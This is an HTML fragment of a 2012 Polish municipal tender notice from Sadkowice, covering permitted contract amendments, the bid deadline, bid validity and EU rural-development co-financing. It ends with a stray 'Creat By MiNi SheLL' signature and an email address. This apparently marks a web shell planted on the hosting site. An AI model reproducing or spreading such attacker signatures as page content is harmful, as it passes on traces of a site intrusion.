<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:  Zamawiający, zgodnie z art. 144 ustawy Prawo zamówień publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

 Zamawiający przewiduje możliwość zmiany umowy, w  następującym zakresie: 

  Może nastąpić  zmiana okresu przewidzianego na zakończanie dostawy gdy: 
1)	zmiana będzie następstwem okoliczności leżących po stronie Zamawiającego, w szczególności  wstrzymanie dostaw  przez Zamawiającego,
2)  wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.

 Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy Zamawiający odstąpić od części umowy lub zmieni zakres umowy gdy nie leży to w interesie Zamawiającego. 

Zmiany w treści  umowy będą dokonywane wyłącznie w formie pisemnego aneksu.
Wszystkie powyższe postanowienia niniejszego punktu-6 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminasadkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sadkowicach
Sadkowice 129A
96-206 Sadkowice
na pisemny wniosek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2012 godzina 11:00, miejsce: Urząd Gminy w Sadkowicach
Sadkowice 129A
96-206 Sadkowice
pok. nr 1 -sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane w ramach działania  Odnowa  i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013. Tytuł operacji : Zagospodarowanie centrum miejscowości Sadkowice oraz zakup wyposażenia w celu organizowania imprez kulturalnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com